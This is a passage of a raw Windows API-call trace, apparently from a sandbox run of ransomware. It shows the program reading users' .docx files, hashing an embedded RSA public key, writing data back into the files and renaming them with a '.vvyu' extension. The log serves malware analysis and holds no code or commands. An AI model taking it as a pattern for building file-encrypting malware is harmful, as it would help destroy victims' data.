HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.833] GetCurrentThreadId () returned 0x264 [0184.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37018 [0184.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.834] GetCurrentThreadId () returned 0x264 [0184.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0184.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0184.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea80 [0184.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea20 [0184.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea38 [0184.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea08 [0184.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea98 [0184.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea68 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea50 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eab0 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea50 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea20 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0184.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0184.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd950 | out: hHeap=0x6a0000) returned 1 [0184.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.844] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x5a99, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x5a99, lpOverlapped=0x0) returned 1 [0184.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.845] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5a9e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.845] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0184.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0184.846] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.846] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.847] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.847] CloseHandle (hObject=0x584) returned 1 [0184.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d41908 [0184.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.848] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\OkF0P0lVbo seJvjybv_.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\okf0p0lvbo sejvjybv_.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\OkF0P0lVbo seJvjybv_.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\okf0p0lvbo sejvjybv_.docx.vvyu")) returned 1 [0184.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.850] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0184.853] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dfc5040, ftCreationTime.dwHighDateTime=0x1d82738, ftLastAccessTime.dwLowDateTime=0xbca0f260, ftLastAccessTime.dwHighDateTime=0x1d834e1, ftLastWriteTime.dwLowDateTime=0xbca0f260, ftLastWriteTime.dwHighDateTime=0x1d834e1, nFileSizeHigh=0x0, nFileSizeLow=0x1435e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oO9yXvHfzy447m.docx", cAlternateFileName="OO9YXV~1.DOC")) returned 1 [0184.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6dd950 [0184.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0184.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd950 | out: hHeap=0x6a0000) returned 1 [0184.853] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\oO9yXvHfzy447m.docx") returned=".docx" [0184.853] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\oO9yXvHfzy447m.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\oo9yxvhfzy447m.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.854] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=82782) returned 1 [0184.854] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.856] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14338, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.856] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.858] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.858] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1435e, lpOverlapped=0x0) returned 1 [0184.863] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.863] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.863] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.863] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.864] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.864] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.865] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.865] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.865] GetLastError () returned 0x0 [0184.865] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.865] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.865] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.865] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.866] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14360) returned 0x2d43778 [0184.866] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6dd950 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9f0 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41920 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea08 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea38 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea98 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea50 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.867] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0184.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0184.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea98 [0184.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0184.868] RtlAllocateHeap (HeapHandle=0x6a0000, 